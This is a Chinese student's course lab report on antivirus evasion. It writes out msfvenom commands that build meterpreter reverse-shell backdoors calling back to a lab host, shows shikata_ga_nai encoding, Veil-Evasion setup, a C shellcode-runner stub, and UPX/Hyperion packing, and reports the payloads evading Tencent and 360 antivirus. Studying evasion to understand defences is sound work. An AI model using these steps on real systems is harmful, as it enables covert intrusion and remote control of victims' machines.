2018-2019-2 网络对抗技术 20165336 Exp3 免杀原理与实践

1.基础问题回答

（1）杀软是如何检测出恶意代码的？

根据计算机病毒课程知道了每个病毒都有其对应的特征码，杀软是根据这些特征码来判定他是不是病毒。
根据该软件的行为进行检测如有异常行为，会被判定为风险文件或病毒。
基于行为的恶意软件检测：在启发式基础上对软件行为进行监控

（2）免杀是做什么？

通过一定的技术手段，将恶意软件处理，使之不会被杀毒软件发现。

（3）免杀的基本方法有哪些？

改变特征码：对于.exe文件可以加壳，对于shellcode可以进行加密然后利用shellcode生成可执行文件，或者用其他语言进行重写再编译
改变行为：根据改变通讯模式、操作模式来实现免杀。

2. 实践内容

任务一：正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分）

1.使用VirusTotal或Virscan这两个网站对实验二生成的后门程序进行扫描。

VirusTotal扫描后结果如下：

2.用msf编码器对后门程序进行一次到多次的编码，并进行检测。

一次编码使用命令：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.1.241 LPORT=5336 -f exe > met-encoded.exe

VirusTotal扫描后结果如下：
十次编码使用命令：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.241 LPORT=5336 -f exe > met-encoded10.exe

VirusTotal扫描后结果如下：

3.msfvenom生成jar文件、php文件

生成java后门程序使用命令：

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.241 LPORT=5336 x> 5336_backdoor_java.jar
VirusTotal扫描后结果如下：
生成php后门程序使用命令：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.241 LPORT=5336 x> 5336_backdoor.php
VirusTotal扫描后结果如下：

4.使用veil-evasion生成后门程序及检测

安装veil

自我尝试方法一：sudo apt-get install veil安装了一个多小时报错，根据问题查找学长学姐的博客和百度最终的原因似乎是因为kali的版本与veil的版本不匹配导致安装失败，还有一个原因是校园网的原因，会导致下载不完全安装出错（网速不好真的难受）。

方法二：使用代理安装,时间比较久需要耐心

# apt-get install libncurses5*

# apt-get install libavutil55*

# apt-get install gcc-mingw-w64*

# apt-get install wine32

# git clone https://github.com/Veil-Framework/Veil

# cd Veil/setup/

# ./setup.sh

安好后use evasion命令进入Evil-Evasion

输入命令use c/meterpreter/rev_tcp.py进入配置界面

设置反弹连接IP，set LHOST 192.168.1.24，IP是KaliIP；设置端口set LPORT 5336

指令generate生成文件，输入playload的名字：veil_c_5336

VirusTotal扫描后结果如下：

5.手工注入Shellcode并执行

使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.241 LPORT=5336 -f c用c语言生成一段shellcode;

vim 20165336.c，然后将unsigned char buf[]赋值到其中

unsigned char buf[] =

代码

int main()

{

    int (*func)() = (int(*)())buf;

    func();

}

使用命令：i686-w64-mingw32-g++ 20165336.c -o 20165336.exe编译这个.c文件为可执行文件;

VirusTotal扫描后结果如下：

6.加壳尝试

加压缩壳upx 20165336.exe -o 20165336_uped.exe

VirusTotal扫描后结果如下：

加密壳Hyperion：进入目录/usr/share/windows-binaries/hyperion/中将20165336_uped.exe拷贝进来并用wine hyperion.exe -v 20165336_upxed.exe 20165336_upxed_Hyperion.exe进行加壳

VirusTotal扫描后结果如下：

任务一小感想

经过前面的操作，我发现对于防止杀毒软件查杀的效果，只有加压缩、加密壳免杀的效果会好一点，其他的都容易被发现。

任务二：通过组合应用各种技术实现恶意代码免杀(0.5分)

用codeblocks的C语言将前面的.c文件里的shellcode加密（加密方式为加五在异或0x66）得到下图的shellcode，然后在进行加压缩壳。

实现免杀效果，并回连成功（自己的杀软为腾讯电脑管家）。

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5）

对舍友电脑进行免杀效果测试并回连成功（舍友的杀软为最新的360安全卫士11）

3.遇到的问题

1.安装veil时出现错误，见上文。
2.在进行加密shellcode需要将.exe文件在win10编译后放入kali，结果我的共享文件夹出问题了，找不到她了，解决办法：sudo vmhgfs-fuse .host:/共享文件名字 /mnt/hgfs,然后共享文件就出现了。

4.开启杀软能绝对防止电脑中恶意代码吗？

我认为不能绝对的防止电脑中恶意代码，因为杀软更新的速度肯定赶不上病毒软件被创新开发出来的速度，对于现在学习的简单免杀技术有时候都能使杀毒软件查杀不出来，况且如果学习的更深入，了解的知识足够多我相信，随随便便攻破杀软都是小事情。并且新的入侵方法也在被不断的开发出来，如果杀软报的是风险软件没有报病毒软件，不懂电脑的人将其忽略并启动运行依旧会导致电脑中恶意代码，所以并不能绝对防止电脑中恶意代码。

5.实践总结与体会

这次实验我是带着很浓厚的兴趣去做的，在这过程中从一开始的msf熟悉到veil的安装再到shellcode变换加壳，我经历过许多困难，尤其是安装veil还把我的kali弄炸了，还好之前备份过不然又得从头安装kali，从后面的免杀结果来看，反而是shellcode加密然后加压缩壳会好一些，但有时候还会被杀毒软件查杀出来，估计是病毒库的不断更新，在免杀效果的实验测试中，我测了我三个舍友的电脑，有联想、惠普的总的来说联想自带的电脑管家+360的防护措施会比较好，惠普安装的360在一开始查杀不出来但经过一段时间后，也依旧能查杀出来，这让我知道病毒库的更新是多么的重要，对于shellcode的加密我认为还有很多种方法，我相信在之后的不断学习中，当我了解更多的知识，我实现免杀效果的方法会更多，成功率会更高，总的来说加强对病毒的防范很重要，防范不规范，蓝屏两行泪啊~~